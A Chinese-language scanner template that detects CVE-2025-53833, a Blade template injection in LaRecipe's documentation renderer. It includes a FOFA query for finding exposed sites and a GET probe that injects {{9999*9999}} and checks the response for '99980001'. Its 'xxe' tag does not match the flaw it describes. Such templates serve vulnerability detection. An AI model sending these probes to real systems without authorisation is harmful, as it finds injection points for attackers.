漏洞描述
在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义
fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section"
id: CVE-2025-53833
info:
name: LaRecipe 模板注入漏洞
author: Superhero
severity: high
description: |-
在于 LaRecipe 的文档渲染模块采用了不安全的动态模板编译方式。具体而言,当系统解析 Markdown 文档时,会直接通过 renderBlade()方法处理文档内容,而未对用户可控内容中的 Blade 模板指令(如 {{ }}、{!! !!})进行过滤或转义
fofa: body="LaRecipe" && body="/larecipe/" || body="/docs/1.0/overview#section"
reference:
- https://mp.weixin.qq.com/s/48pDe8DLDJIqFgQztcczSw
- https://nvd.nist.gov/vuln/detail/CVE-2025-53833
tags: cve,cve2025,larecipe,xxe
created: 2025/07/30
rules:
r0:
request:
method: GET
path: /docs/1.0/?{{9999*9999}}
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
expression: response.status == 200 && response.body.bcontains(b'99980001')
expression: r0()